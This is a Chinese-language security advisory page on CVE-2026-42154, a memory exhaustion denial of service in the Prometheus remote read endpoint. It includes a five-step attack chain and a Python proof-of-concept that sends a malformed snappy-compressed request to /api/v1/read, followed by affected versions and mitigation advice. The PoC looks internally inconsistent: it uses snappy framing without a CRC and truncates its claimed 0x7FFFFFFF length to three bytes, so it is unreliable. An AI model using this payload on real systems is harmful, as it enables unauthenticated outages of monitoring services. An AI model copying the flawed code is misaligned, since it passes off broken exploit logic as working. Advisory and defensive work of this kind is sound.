IPBUF安全漏洞报告
English
CVE-2026-42154 CVSS 7.5 高危

CVE-2026-42154 Prometheus远程读取端点内存耗尽漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42154
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Prometheus

相关标签

拒绝服务Prometheus内存耗尽CVE-2026-42154

漏洞概述

Prometheus是一个开源监控系统。在3.5.3和3.11.3之前的版本中,其远程读取端点存在一个漏洞。系统在处理snappy压缩请求时,未验证请求体中声明的解码长度就直接分配内存。未经身份验证的攻击者可以通过发送特制的小数据包触发巨大的内存分配。在并发负载下,这会导致内存耗尽,从而使Prometheus服务崩溃。

技术细节

该漏洞位于Prometheus的`/api/v1/read`接口。在处理Snappy压缩的请求体时,程序读取压缩头中声明的解压长度,但未对该长度进行合理性校验。攻击者可以构造一个包含极小实际数据但声明了极大解压长度(例如数GB)的恶意请求包。当Prometheus处理该请求时,会根据声明长度尝试在堆上分配大量内存。由于攻击无需认证且易于触发,通过并发发送此类请求,可迅速耗尽服务器可用内存,导致OOM并使Prometheus进程崩溃。

攻击链分析

STEP 1
侦察
攻击者扫描网络,寻找暴露在互联网上的Prometheus服务器(默认端口9090)。
STEP 2
构造载荷
攻击者编写脚本,生成包含恶意Snappy压缩头的HTTP请求数据包,其中声明了极大的解压长度。
STEP 3
发送请求
攻击者向目标的`/api/v1/read`端点发送大量并发请求,无需经过身份验证。
STEP 4
触发漏洞
Prometheus服务端解析请求时,根据恶意声明的长度分配大量堆内存,导致系统资源迅速耗尽。
STEP 5
达成影响
服务器内存不足,Prometheus进程被系统终止,监控服务中断,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import struct target = "http://localhost:9090/api/v1/read" # Construct a malicious Snappy stream chunk # Snappy chunk format: [Tag(1 byte)] [Length(3 bytes)] [Data] # Tag 0x01 represents a literal chunk. # We set a huge length to trigger the allocation. huge_length = 0x7FFFFFFF # Max 32-bit signed int # Pack length as 3 bytes little-endian length_bytes = struct.pack('<I', huge_length)[:3] # Payload: Stream identifier + Malformed Chunk # 0xff is stream identifier, followed by 'sNaPpY' payload = b'\xff\x06\x00\x00sNaPpY' # Add a chunk claiming huge size but minimal actual data payload += b'\x01' + length_bytes + b'A' headers = { "Content-Encoding": "snappy", "Content-Type": "application/x-protobuf" } try: r = requests.post(target, data=payload, headers=headers) print(f"Status: {r.status_code}") except Exception as e: print(f"Exploitation attempt failed: {e}")

影响范围

Prometheus < 3.5.3
Prometheus < 3.11.3

防御指南

临时缓解措施
如果无法立即升级,建议通过防火墙限制对`/api/v1/read`接口的访问来源,或配置反向代理丢弃异常的压缩请求头。同时,建议对Prometheus服务实施内存资源限制(如容器cgroup限制),防止其耗尽宿主机资源。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表